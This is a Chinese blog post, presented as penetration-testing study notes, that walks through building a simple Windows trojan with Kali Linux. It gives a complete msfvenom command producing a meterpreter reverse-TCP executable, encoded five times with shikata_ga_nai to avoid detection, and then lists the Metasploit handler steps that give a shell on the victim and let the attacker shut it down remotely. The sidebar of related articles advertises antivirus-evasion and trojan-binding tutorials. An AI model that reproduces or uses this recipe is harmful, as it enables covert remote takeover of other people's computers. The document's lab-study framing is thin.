kali木马 简易木马制作与应用

最新推荐文章于 2024-05-29 22:21:42 发布
置顶 最新推荐文章于 2024-05-29 22:21:42 发布
阅读量4.8k 收藏 47
点赞数 3
分类专栏: # 网安—Kali的使用 文章标签: linux 运维 kali kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44867435/article/details/118183834
版权

Kali——木马(一)

学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。

—— 简易木马制作与应用 ——

一.流程

  1. 首先确定靶机和攻击主机可以连通
  2. 利用msfvenom创建木马程序
    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=xxx.xxx.xxx.xxx(攻击主机的ip) LPORT=xxx(攻击主机的端口) -f exe >pink.exe

01

  1. 查看目录,可以看到木马程序。
    02
  2. 打开msf,编辑远程模块,设置payload,具体流程如下图
    03
    04
    这里的lhost和lport填写的内容和第二步填写的内容相同
    05
  3. 输入exploit,同时在靶机点击运行木马程序,在攻击主机就可以看到连接成功的消息。输入shell进入靶机系统。
    06
  4. 可以看到有些乱码,我们消除这些乱码。
    chcp 437
    07
  5. 也可以直接远程关闭靶机
    08
胡乱huluan
关注
  • 3
    点赞
  • 47
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
msf之msfvenom的使用—使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 3674
msfvenom的使用
Kali Linux使用Metasploit生成木马入侵安卓系统
简介
02-24 8136
前言,前言这是我最难想出来的对,这是我最后一篇文章,周一我们开学了,漏洞实战怕实现不了,至少放假可以更文章,我们只放一天,提示:以下是本篇文章正文内容,下面案例可供参考时间不够了,所以不做演示了,所以再见。
KaLi木马渗透实战案例
开摆工作室(kbai.cc)
04-04 4786
KaLi木马渗透实战案例
kali制作木马并使用shellter免杀工具来实现更低的查杀率
最新发布
勤能补拙
05-29 820
Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。俗称为免杀。
网络安全技术新手入门:利用Kali Linux生成简单的远程控制木马
weixin_56154577的博客
01-08 5092
本文对木马的生成过程讲的比较详细,适合对网络安全技术感兴趣的小伙伴们,读完本文之后,读者可以对木马的形成、传播、对靶机的控制流程有一个逻辑性的理解
使用kali渗透工具msfvenom生成远控木马
m0_74981852的博客
06-04 2633
在杀毒软件中可以找回文件并信任改文件。右键复制到自己的电脑的一个位置,注意。1.打开kali终端>输入。2.1查看生成的后门文件。6.对目标主机进行攻击。运行之后,去目标主机。
kali】生成木马并绑定正常软件实现远控
qq_20410657的博客
10-20 774
如果没有则需要进行安装。
详解kali linux 常用文件与指令路径
09-14
Kali Linux是一款基于Debian的Linux发行版,专为网络安全和渗透测试而设计。了解其常用的文件和指令路径对于高效地使用Kali Linux至关重要。以下是一些关键的路径和指令,以及如何解决Linux下的MySQL root密码遗忘...
教主Kali与Python黑客 目录与拓扑
10-14
"教主Kali与Python黑客 目录与拓扑" 本资源主要介绍了Kali Linux与Python黑客的目录与拓扑结构,涵盖了网络安全相关的多个方面,包括网络扫描、漏洞发现、社会工程学攻击、维持访问、WEB攻击、无线网络攻击、网络...
基于kali的免杀木马技术研究.doc
09-07
基于kali的免杀木马技术研究.doc
Kali Linux网络扫描应用教程
03-12
Kali Linux网络扫描应用教程
kali制作绕过火绒检测的木马(仅通过MSF的方式)
qq_50854662的博客
02-14 3247
kali制作绕过火绒检测的木马(仅通过MSF的方式)
Kali Linux渗透测试小实践——Metasploit与后门木马
PICACHU+++的博客
01-08 2750
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
kali生成木马
Massimo__JAVA的博客
04-25 2029
攻击机:kali 192.168.116.128受害机:win7 192.168.116.124目标:使用kali
使用KALI生成木马病毒实现远程控制
小司机的奥拓
12-25 3267
该文章内容仅用于学习使用Kali Linux系统,请不要将它用于非法的途径,如有意外概不负责。我将会详细介绍使用Kali Linux系统生成木马并用它远程控制一台处在外网的物理计算机,使用到的工具有:1、VMware Workstation Pro 16(虚拟机)下载地址:https://www.vmware.com/cn/products/workstation-pro/workstation-pro-evaluation.html2、Kali Linux 2021(系统)
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
xnxqwzy的博客
02-23 3150
永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。
【记录】kali制作绕过火绒检测的木马(仅通过MSF的方式)
热门推荐
weixin_44647915的博客
04-18 1万+
目的:制作一个能够绕过火绒检测的简单木马,熟悉一下怎么使用msfvenom制作木马,因此此处使用的火绒版本较低。 工具准备:火绒安全-3.0.42.0 下载文章:火绒历史全版本 百度网盘链接:https://pan.baidu.com/s/1ZrpYG63aDtQDVBnDFZoeXw 提取码:kr72 实验环境:kali-2019.4 (攻击方,IP:192.168.152.134)、win10(靶机) 【知识补充】 关于Msfvenom: (msfvenom ----a Metasploi
Kali linux windows木马(外网) 保姆级教学
m0_73135216的博客
01-01 3286
kali linux 木马实现外网控制(保姆级教学)
木马渗透外网机器,kali+frp 供学习交流
m0_73661152的博客
07-17 2015
前言:在kali的学习中木马起到了重要性的作用,木马不需要利用任何漏洞就可以实现对目标机器的渗透,所以木马是一支利箭,而没有弓弩单凭手抛却不能发挥它的最大作用。关于木马加密方案,博主并没有深入研究,Android木马先阶段属于裸奔,windows木马可以通过Themida程序加密效果不错可以过火绒,百度可以寻找教程,不过多赘述。由于CentOS和kali的内核都是Linux 所以kali的frp安装步骤与服务器相同(但是客户端编辑的是frps.ini文件,不要于服务器端的frpc.ini混淆)
如何使用kali的msf制作木马
06-10
我很抱歉,我不能回答如何使用Kali的Metasploit Framework(MSF)制作木马的问题,因为这涉及到违法和不道德的行为。MSF是一个用于漏洞测试和渗透测试的工具,但其目的是帮助安全专业人员和网络管理员保护网络安全,而不是破坏网络安全。在任何情况下,不要试图使用Kali或任何其他工具来制作或传播恶意软件,否则你可能会面临法律责任。请遵守相关法规和道德规范,使用工具来促进网络安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值